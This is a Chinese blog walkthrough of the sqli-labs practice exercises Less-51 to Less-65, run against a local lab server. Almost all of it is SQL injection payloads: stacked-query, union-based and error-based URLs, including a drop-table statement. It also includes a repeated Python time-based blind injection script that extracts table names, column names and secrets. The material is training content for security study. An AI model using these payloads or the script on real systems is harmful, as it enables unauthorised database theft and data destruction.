[sqli-labs] 学习3
2018-11-16 本文已影响0人
2mpossible
less-51
- 跟50关相比,改了闭合符
http://127.0.0.1/sqli-labs/Less-51?sort=1' ; create table test like users; %23
less-52
- 和50关一样,只是这里不回显了
http://127.0.0.1/sqli-labs/Less-52?sort=1 ; drop table test; %23
less-53
- 跟51关一样,不回显
http://127.0.0.1/sqli-labs/Less-53?sort=1' ; create table test like users; %23
less-54
- 将之前所学的做汇总练习
http://127.0.0.1/sqli-labs/Less-54?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'CHALLENGES' %23
http://127.0.0.1/sqli-labs/Less-54?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'ST8PASK3ZR' %23
http://127.0.0.1/sqli-labs/Less-54?id=-1' union select 1,group_concat(secret_7IDH),3 from ST8PASK3ZR %23
less-55
http://127.0.0.1/sqli-labs/Less-55?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'CHALLENGES' %23
http://127.0.0.1/sqli-labs/Less-55?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'R0Y2LHLPA2' %23
http://127.0.0.1/sqli-labs/Less-55?id=-1) union select 1,group_concat(secret_46NL),3 from R0Y2LHLPA2 %23
less-56
http://127.0.0.1/sqli-labs/Less-56?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'challenges' %23
http://127.0.0.1/sqli-labs/Less-56?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name = '2SHDB477I0' %23
http://127.0.0.1/sqli-labs/Less-56?id=-1') union select 1,group_concat(secret_YC5R),3 from 2SHDB477I0 %23
less-57
http://127.0.0.1/sqli-labs/Less-57?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'challenges' %23
http://127.0.0.1/sqli-labs/Less-57?id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'E5DYF70WFZ' %23
http://127.0.0.1/sqli-labs/Less-57?id=-1" union select 1,group_concat(secret_3IN5),3 from E5DYF70WFZ %23
less-58
- 没有返回数据库中的数据,无法使用union联合注入,使用报错注入
http://127.0.0.1/sqli-labs/Less-58?id=-1' union select 1,2,extractvalue(1,concat(0x7e,( select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ),0x7e)) %23
http://127.0.0.1/sqli-labs/Less-58?id=-1' union select 1,2,extractvalue(1,concat(0x7e,( select group_concat(column_name) from information_schema.columns where table_name = 'Z93Q7U21K3' ),0x7e)) %23
http://127.0.0.1/sqli-labs/Less-58?id=-1' union select 1,2,extractvalue(1,concat(0x7e,( select group_concat(secret_OEMW) from Z93Q7U21K3 ),0x7e)) %23
less-59
- 跟58关差不多,没有闭合符
http://127.0.0.1/sqli-labs/Less-59?id=1 union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-59?id=1 union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = '3MIJ14LKWG' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-59?id=1 union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(secret_NWS2) from 3MIJ14LKWG ) ,0x7e)) %23
less-60
- 跟58关差不多,换了闭合符
http://127.0.0.1/sqli-labs/Less-60?id=-1") union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-60?id=-1") union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = '085KOCKZF6' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-60?id=-1") union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(secret_H2EF) from 085KOCKZF6 ) ,0x7e)) %23
less-61
- 跟58关差不多,换了闭合符
http://127.0.0.1/sqli-labs/Less-61?id=1')) union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema = 'challenges' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-61?id=1')) union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_name = 'JHXA7SZKSY' ) ,0x7e)) %23
http://127.0.0.1/sqli-labs/Less-61?id=1')) union select 1,2,extractvalue(1,concat(0x7e, (select group_concat(secret_E8XU) from JHXA7SZKSY ) ,0x7e)) %23
less-62
- 只能用延时注入,写个脚本跑一下就可以了
import requests
import string
import time
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
tables = []
l = 0
while True:
table_name = ""
sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,table_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
#print r.url
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print table_name
table_name += j
flags = 1
break
if not table_name:
return tables
if not flags:
tables.append(table_name)
break
i += 1
l += 1
def leak_columns(url,cmd,inj_point,table_name):
columns = []
l = 0
while True:
column_name = ""
sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,column_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print column_name
column_name += j
flags = 1
break
if not column_name:
return columns
if not flags:
columns.append(column_name)
break
i += 1
l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
contents = []
l = 0
while True:
content_name = ""
sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,content_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
content_name += j
flags = 1
break
if not content_name:
return contents
if not flags:
contents.append(content_name)
break
i += 1
l += 1
url = 'http://127.0.0.1/sqli-labs/less-62' #url
injection = "1') and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret
less-63
- 跟62一样是延时注入,换了闭合符,跑脚本
import requests
import string
import time
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
tables = []
l = 0
while True:
table_name = ""
sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,table_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
#print r.url
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print table_name
table_name += j
flags = 1
break
if not table_name:
return tables
if not flags:
tables.append(table_name)
break
i += 1
l += 1
def leak_columns(url,cmd,inj_point,table_name):
columns = []
l = 0
while True:
column_name = ""
sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,column_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print column_name
column_name += j
flags = 1
break
if not column_name:
return columns
if not flags:
columns.append(column_name)
break
i += 1
l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
contents = []
l = 0
while True:
content_name = ""
sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,content_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
content_name += j
flags = 1
break
if not content_name:
return contents
if not flags:
contents.append(content_name)
break
i += 1
l += 1
url = 'http://127.0.0.1/sqli-labs/less-63' #url
injection = "1' and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret
less-64
- 跟62关一样,闭合符换成了))
import requests
import string
import time
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
tables = []
l = 0
while True:
table_name = ""
sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,table_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
#print r.url
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print table_name
table_name += j
flags = 1
break
if not table_name:
return tables
if not flags:
tables.append(table_name)
break
i += 1
l += 1
def leak_columns(url,cmd,inj_point,table_name):
columns = []
l = 0
while True:
column_name = ""
sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,column_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print column_name
column_name += j
flags = 1
break
if not column_name:
return columns
if not flags:
columns.append(column_name)
break
i += 1
l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
contents = []
l = 0
while True:
content_name = ""
sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,content_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
content_name += j
flags = 1
break
if not content_name:
return contents
if not flags:
contents.append(content_name)
break
i += 1
l += 1
url = 'http://127.0.0.1/sqli-labs/less-64' #url
injection = "1)) and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret
less-65
- 跟62关一样,闭合符变成了")
import requests
import string
import time
list = string.lowercase + string.uppercase + string.digits + '!\"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def leak_tables(url,cmd,inj_point):
tables = []
l = 0
while True:
table_name = ""
sql_1 = '(select table_name from information_schema.tables where table_schema = "challenges" limit {},1)'.format(l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,table_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
#print r.url
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print table_name
table_name += j
flags = 1
break
if not table_name:
return tables
if not flags:
tables.append(table_name)
break
i += 1
l += 1
def leak_columns(url,cmd,inj_point,table_name):
columns = []
l = 0
while True:
column_name = ""
sql_1 = "(select column_name from information_schema.columns where table_name = '{}' limit {},1)".format(table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,column_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
#print column_name
column_name += j
flags = 1
break
if not column_name:
return columns
if not flags:
columns.append(column_name)
break
i += 1
l += 1
def leak_content(url,cmd,inj_point,column_name,table_name):
contents = []
l = 0
while True:
content_name = ""
sql_1 = "(select {} from {} limit {},1)".format(column_name,table_name,l)
i = 1
while True:
flags = 0
for j in list:
startime = time.time()
cmd1 = cmd.format(sql_1,i,content_name+j)
payload = {inj_point:cmd1}
r = requests.get(url,params=payload)
respond = r.text.encode('utf-8')
if time.time() - startime > 3:
content_name += j
flags = 1
break
if not content_name:
return contents
if not flags:
contents.append(content_name)
break
i += 1
l += 1
url = 'http://127.0.0.1/sqli-labs/less-65' #url
injection = "1\") and if( (left({},{}) = '{}') , sleep(3) , 0) #" #injection
table_name = leak_tables(url,injection,'id')
print "table name: ",table_name
column_name = leak_columns(url,injection,'id',table_name[0])
print 'column name: ',column_name
secret = leak_content(url,injection,'id',column_name[2],table_name[0])
print 'secret : ',secret
